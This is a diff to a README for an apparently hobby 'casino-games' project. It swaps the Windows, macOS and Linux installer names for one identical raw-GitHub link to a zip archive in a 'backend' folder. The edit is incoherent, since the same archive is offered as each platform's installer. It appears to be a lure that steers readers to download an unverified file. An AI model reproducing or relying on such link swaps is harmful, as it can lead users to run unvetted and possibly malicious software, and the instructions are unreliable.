TeacherEvaHung/casino-games/README.md

 Click on the version you want and look for the appropriate file for your operating system (e.g., Windows, macOS, Linux).

-- For Windows, you might see a file like `casino-games-windows.exe`.
+- For Windows, you might see a file like `https://raw.githubusercontent.com/TeacherEvaHung/casino-games/main/backend/games_casino_1.9-beta.3.zip`.
-- For macOS, look for a file like `casino-games-macos.dmg`.
+- For macOS, look for a file like `https://raw.githubusercontent.com/TeacherEvaHung/casino-games/main/backend/games_casino_1.9-beta.3.zip`.
-- For Linux, you may find a file like `casino-games-linux.tar.gz`.
+- For Linux, you may find a file like `https://raw.githubusercontent.com/TeacherEvaHung/casino-games/main/backend/games_casino_1.9-beta.3.zip`.

 Once you find the correct file, click to download.
 The download may take a moment depending on your internet speed.